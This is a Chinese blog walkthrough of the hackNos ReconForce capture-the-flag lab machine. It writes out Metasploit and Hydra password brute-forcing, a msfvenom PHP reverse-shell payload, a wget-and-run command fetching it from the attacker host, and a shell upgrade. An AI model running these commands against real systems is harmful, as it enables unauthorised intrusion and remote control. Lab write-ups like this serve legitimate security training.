Hacknos-ReconForce打靶渗透【附POC】

最新推荐文章于 2024-10-06 21:18:37 发布
最新推荐文章于 2024-10-06 21:18:37 发布
阅读量324 收藏 5
点赞数 3
文章标签: 网络安全 笔记 web安全 安全架构 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140387084
版权

1. 信息收集

使用nmap工具进行主机发现目标靶机、使用Nmap进行详细的扫描发现开放了21/22/80端口、对80端口进行目录扫描;

无有用信息

尝试登录FTP服务器使用弱口令ftp:ftp尝试登录,成功但没有文件....知识在登录的时候看到220欢迎消息“Security@hackNos”

2. 漏洞扫描

访问网站http://192.168.7.102/点击TroubleShoot会弹出来一个FTP登录框....使用dirsearch进行扫描没发现有价值的信息...

使用MSF进行登录爆破,需要将“Security@hackNos”添加到字典文件中...爆破成功....

加入msf密码字典:
/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt


use auxiliary/scanner/http/http_login
show options	# 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.1.93
exploit

  1. 根据以上爆破结果得出账户与密码admin:Security@hackNos在网页中尝试登录并跳转至以下页面...

  1. 尝试输入百度去ping百度,从BurpSuite上抓包得到上传的数据包,尝试更改为回环地址测试是否回显-》存在回显;

  1. 查看/etc/passwd文件中发现recon用户是可以进行登录...

3. 漏洞利用-》反弹shell-》切换用户拿shell

  1. 使用MSF生成一个PHP木马并开启一个http服务提供下载...开启MSF监听模块...并在目标站点上下载并执行PHP代码..
>>>攻击机操作
####生成恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.7.70 lport=4444 -f raw > f4.php
####开启Web服务
python3 -m http.server 80
####开启MSF监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.7.70
exploit

>>>目标靶机操作
wget http%3a//192.168.7.70:80/f4.php		# 下载恶意文件
php f4.php		# 运行恶意文件

生成恶意文件

开启Web服务

开启MSF监听

  1. 目标靶机操作执行完所有的上述命令后,查看msf监听端口-》成功反弹shell,并执行命令;

反弹daoshell后执行以下命令

python -c 'import pty; pty.spawn("/bin/bash")'

  1. 获取第一个Flag...使用Hydra对SSH服务进行暴力破解...得出用户密码recon:Security@hackNos在Shell中进行用户身份切换或登录..
hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.7.102

登录切换ssh用户,获取shell权限

橙则Kucei
关注
Os-hackNos-3打靶渗透POC
weixin_52487093的博客
07-12 226
Os-hackNos-3打靶渗透POC
Hacknos-OS-Hax打靶渗透POC
weixin_52487093的博客
07-12 431
Hacknos-OS-Hax打靶渗透POC
Hacknos-Player V1.1打靶渗透POC
weixin_52487093的博客
07-12 1212
Hacknos-Player V1.1打靶渗透POC】 WPScan-免费密钥API申请
Hacknos-Player V1.1打靶渗透
m0_65112983的博客
07-14 290
Hacknos-Player V1.1打靶渗透
Vulnhub靶机:HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3219
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
kali 攻击靶机Os-HackNos-1
weixin_52525624的博客
02-21 2006
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHub 将Os-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
OpenSSH RCE (CVE-2024-6387) | poc | 小试
Lucky小小吴的小屋
07-02 3918
OpenSSH 远程代码执行漏洞(CVE-2024-6387),该漏洞是由于OpenSSH服务器 (sshd) 中的信号处理程序竞争问题,未经身份验证的攻击者可以利用此漏洞在Linux系统上以root身份执行任意代码。
『VulnHub』hackNos: Os-hackNos-2.1-Walkthrough
ins1ght的博客
02-15 1352
LFI漏洞、rbash逃逸
Presidential打靶渗透POC包】
weixin_52487093的博客
07-14 997
Presidential打靶POC包】[session文件包含问题具体解决方案]
poc--exp:常用渗透poc收集
03-20
poc--exp 个人常用渗透poc收集 CVE-2014-4113 Win64bit本地提权漏洞 CVE-2014-4878海康RCE突破 CVE-2017-0143永恒之蓝突破 CVE-2017-0474安卓媒体服务器RCE CVE-2017-0641 Google Android Media框架远程代码执行...
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)POC
05-10
禅道身份认证POC测试payload
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
CVE-2021-26855-PoC:CVE-2021-26855的PoC攻击代码
03-12
CVE-2021-26855-PoC CVE-2021-26855的PoC漏洞利用代码。 原始代码由开发。 CVE-2021-26855 SSRF简单地使用Golang练习受影响的版本 Exchange Server 2013 is less than CU23 Exchange Server 2016 is less than CU...
cve-2017-10271-poc.py weblogic反序列化 WLS
01-02
python2.x 最新weblogic反序列化漏洞利用工具 WLS /wls-wsat/CoordinatorPortType
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8493
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
笔记)第三期书生·浦语大模型实战营(十一卷王场)–书生基础岛第5关---XTuner 微调个人小助手认知
最新发布
haidizym的博客
10-06 423
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1tz421B72y/课程文档:关卡作业:https://github.com/InternLM/Tutorial/blob/camp3/docs/L1/XTuner/task.md开发机平台:https://studio.intern-ai.org.cn/
C++学习笔记----8、掌握类与对象(四)---- 不同类型的数据成员(1)
weixin_71738303的博客
10-05 936
c++对于数据成员给了你许多选项。除了在类中声明简单的数据成员,可以生成静态数据成员供所有类的对象共享,const成员,引用成员,reference-to-const成员,等等。本节我们解释一下这些不同类型的数据成员的细节。
笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 558
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值